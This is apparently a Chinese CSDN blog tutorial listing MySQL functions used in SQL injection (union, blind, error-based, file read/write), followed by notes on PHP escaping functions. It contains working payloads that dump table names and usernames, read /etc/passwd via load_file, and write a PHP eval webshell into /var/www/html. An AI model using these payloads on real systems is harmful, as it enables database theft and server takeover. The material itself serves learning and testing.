sql注入常见函数(附图详解)

最新推荐文章于 2024-04-26 15:30:51 发布
最新推荐文章于 2024-04-26 15:30:51 发布
阅读量7.1k 收藏 94
点赞数 14
分类专栏: Mysql注入天书 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45744814/article/details/120436723
版权

目录

0x01 mysql数据库基本函数

#MySQL数据库版本
version()

#数据库用户名
user()

#当前数据库名
database()

#数据库安装路径
@@basedir

#数据库文件存放路径
@@datadir

#操作系统版本
@@version_compile_os

0x02 union联合注入函数

函数concat()

语法:concat(str1,str2,…)
拼接字符串,直接拼接,字符之间没有符号
在这里插入图片描述

函数concat_ws()

语法:concat_ws(‘separator’, str1, str2, …)
指定符号进行拼接
在这里插入图片描述
在这里插入图片描述

函数group_concat()

group_concat(username)
将username中的内容以逗号隔开显示出来
在这里插入图片描述

0x03 sql盲注函数

1. 布尔盲注函数

函数length()

返回指定对象的长度
length(database())返回当前数据库名的长度
在这里插入图片描述

函数left()与函数right()

left(str,num):对字符串str从左开始数起,返回num个字符(与函数right()相反)
在这里插入图片描述

函数substr()

substr()和substring()函数实现的功能是一样的,均为截取字符串。
substr(database(),1,1),查看数据库名第一位,substr(database(),2,1)查看数据库名第二位,依次查看各位字符。

substr(database(),1,3)
当前数据库名为security,从第1位开始,截取3位
在这里插入图片描述
substr(database(),4,1)
当前数据库名,从第4位开始,截取1位
在这里插入图片描述

函数mid()

与substr()函数用法相同
在这里插入图片描述

函数ascii()

返回字符串str的最左字符的数值,ASCII()返回数值是从0到255
在这里插入图片描述在这里插入图片描述

函数ord()

与函数ascii()相同,返回字符串第一个字符的 ASCII 值。
在这里插入图片描述

2. 时间盲注函数

函数sleep()
sleep(5)	   过5s响应
函数if()
if(1=1,3,4)		返回3
if(1=2,3,4)		返回4

在这里插入图片描述

0x04 报错注入函数

函数floor()

函数floor(),向下取整
floor(3.8) = 3
函数rand(),取随机数,若有参数x,则每个x对应一个固定的值
rand(0) = (0,1)内的任意一个数

在这里插入图片描述

函数exp()

函数exp()是以e为底的指数函数
在这里插入图片描述
~0表示对0进行按位取反
在这里插入图片描述

将0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。
通过子查询与按位取反,造成一个DOUBLE overflow error,并借由此注出数据。

1" union select 1,2,exp(~(select * from (select database())a))--+

在这里插入图片描述

1" union select 1,2,exp(~(select * from (select group_concat(table_name) from information_schema.tables where table_schema=database())a))--+

在这里插入图片描述

函数updatexml()

updatexml(XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据

select updatexml(1,concat(0x7E,(select database()),0x7E),1);

在这里插入图片描述

函数extractvalue()

extractvalue(XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).
在数据库中报错

 select extractvalue(1,concat(0x7E,(select database()),0x7E));
 select extractvalue(1,concat(0x7E,(select group_concat(username) from users),0x7E));

在这里插入图片描述

0x05 读写文件函数

  1. 函数load_file()
    作用:load_file这个函数是读取文件的
#读取文件/etc/passwd (还可以查看其他文件,需要相应的权限)
#路径可以为这两种格式"\\"与"/",
union select 1,2,load_file('/etc/passwd')
  1. 函数into outfile
    作用:函数into outfile 与 into dumpfile都是写文件
#在/var/www/html新建文件a.php,在将一句话木马写入
union select 1,2,"<?php @eval($_POST[cmd]);?>" into dumpfile '/var/www/html/a.php'

0x06 其他相关的PHP函数

函数addslashes()

作用:函数返回在预定义字符之前添加反斜杠的字符串

预定义字符是:

单引号(’)
双引号(")
反斜杠(\)
NULL
在这里插入图片描述

函数stripslashes()

作用:stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。

在这里插入图片描述

函数get_magic_quotes_gpc()

作用:函数get_magic_quotes_gpc()用于获取当前 magic_quotes_gpc 的配置选项设置

  1. 对于magic_quotes_gpc=on的情况, 我们可以不对输入和输出数据库的字符串数据作 addslashes()和stripslashes()的操作,数据也会正常显示。 如果此时你对输入的数据作了addslashes()处理, 那么在输出的时候就必须使用stripslashes()去掉多余的反斜杠。

  2. 对于magic_quotes_gpc=off 的情况 必须使用addslashes()对输入数据进行处理,但并不需要使用stripslashes()格式化输出因为addslashes()并未将反斜杠一起写入数据库,只是帮助mysql完成了sql语句的执行

函数mysql_real_escape_string()

作用: 转义 SQL 语句中使用的字符串中的特殊字符

下列字符受影响:

\x00
\n
\r


"
\x1a

君莫hacker
关注
  • 14
    点赞
  • 94
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql生成助记码函数.txt
05-10
sql生成助记码函数.txt
SQL注入基础
qq_15618139的博客
11-02 234
首先SQL语句对大小写不敏感,这也导致了后台程序对大小写的检测失效。 SQL 注释语句 ("--"与"/*...*/") (1)–:表示单行注释 (2)/…/:用于多行(块)注释 SELECT 查询语句 SQL SELECT 语法 SELECT 列名称 FROM 表名称 SELECT * FROM 表名称 UNION 操作符 UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 请注意,UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。
SQL注入常见函数
m0_74855736的博客
03-09 1841
SQL注入常见函数
sql注入与转义的php函数代码
01-20
sql注入:   正常情况下:     delete.php?id=3;    $sql = ‘delete from news where id = ‘.$_GET[‘id’];   恶意情况:     delete.php?id=3 or 1;    $sql = ‘delete from news where id = 3 or 1’;  ——-如此执行后,所有的记录将都被删除    应该采取相关措施。。。比如用之前先判断是否是数字等等。 要使自己相信,从客户端传来的信息永远是不可靠的!! 转义:   有时候从客户端传来的数据,可能恶意包含些特殊的字符,比如单引号、斜杠等,所以需要转义,
SQL Server分隔函数实例详解
01-19
有时候我们在SQL Server中需要对一些字符串进行分隔,比如a,b,c ,按照‘,’进行分割,可以使用下边这个函数方法,新建方法如下:  CREATE FUNCTION dbo.f_splitstr(@SourceSql NVARCHAR(MAX),@StrSeprate VARCHAR(100)) RETURNS @temp TABLE(F1 VARCHAR(100)) AS BEGIN DECLARE @ch AS VARCHAR(100) SET @SourceSql=@SourceSql+@StrSeprate WHILE(@SourceSql<>'') B
discuz的php防止sql注入函数
10-28
最早开始学习php的时候根本没考虑过安全方面的问题,那时候就是想能做出功能就是万岁了。随着做项目的时间慢慢加长,越来越感觉到网站安全方面的问题十分重要。
SQL注入用到的SQL函数
m0_61368098的博客
08-19 2215
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。应用程序使用用户输入的内容来构造动态sql语句以访问数据库,恶意用户通过提交恶意sql语句拿到网站数据库中所有的数据。联合查询时,常为显示位不足的问题困扰,数据多的话一个一个查工作量大,主要是效率低,而连接函数就可以解决这个问题。)不然执行不了,在注入时这个分号是不用加的。报错注入需要用到的函数-----------floor。查询结果正确,返回1,查询结果错误,返回0。
注入中常见SQL函数
qq_63484934的博客
09-20 320
exp()函数是以e为底的指数函数,当指数参数为正数时,返回值的大小迅速增加;position(substr in str)返回substr字符串在str中出现的位置,没有返回0。locate(substr,str)返回substr字符串在str中出现的位置,没有返。语句:select ascii(mid(user(),1));语句:select substring(user(),1,2);substring()函数,left(),mid()函数。语句:select left(user(),5);
SQL注入语句总结及常用函数解释
qq_62886656的博客
05-03 1195
常用注入时所用函数介绍-----参考sql-labs总结 updatexml() 函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; 该函数对XPath_string进行查询操作,如果符合语法格式要求,则用第三个参数替换
sql注入方式及知识点总结(超详细)
qq_67473072的博客
07-22 2085
sql注入方式及知识点总结(超详细)
sql 助记码
skyppt的专栏
09-14 595
set ANSI_NULLS ONset QUOTED_IDENTIFIER ONgoALTER FUNCTION [dbo].[uf_GetSpellCode](                        @string nvarchar(2000)                    )        returns nvarchar(1000)    AS BEGIN       
ASP.NET防止SQL注入函数
04-02
ASP.NET防止SQL注入函数,C harp代码
php中addslashes函数sql防注入
10-25
主要介绍了php中addslashes函数sql防注入,实例讲述了采用addslashes函数对于sql防注入的用处,对于PHP安全程序设计来说具有不错的参考借鉴价值,需要的朋友可以参考下
mybatis防止SQL注入的方法实例详解
08-27
SQL注入是一种很简单的攻击手段,但直到今天仍然十分常见。那么mybatis是如何防止SQL注入的呢?下面脚本之家小编给大家带来了实例代码,需要的朋友参考下吧
php防止sql注入的方法详解
12-18
常见SQL注入式攻击过程类如:  ⑴ 某个ASP.NET Web应用有一个登录页面,这个登录页面控制着用户是否有权访问应用,它要求用户输入一个名称和密码。   ⑵ 登录页面中输入的内容将直接用来构造动态的SQL命令,...
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
MySQL生成日期序列与表关联的 SQL 查询
lcl17779740668的博客
04-23 765
MySQL生成日期序列与表关联的SQL查询
sql将日期区间拆分为多行
chinacmt的博客
04-25 290
日期拆分
oracle sql monitor简单使用说明
最新发布
雅冰石的专栏
04-26 297
activity活动这里显示时间大多花在了哪里。
防止sql注入函数
01-18
在Mybatis中,为了防止SQL注入攻击,可以使用concat()函数。该函数可以将多个字符串连接在一起,而不会导致SQL注入的问题。 以下是一个使用concat()函数防止SQL注入的示例: ```xml <select id="getUserByName" parameterType="String" resultType="User"> SELECT * FROM user WHERE name = #{name} AND password = #{password} </select> ``` 在上述示例中,使用了concat()函数来连接字符串,而不是直接拼接字符串。这样可以避免用户输入的内容被当作SQL语句的一部分执行,从而防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值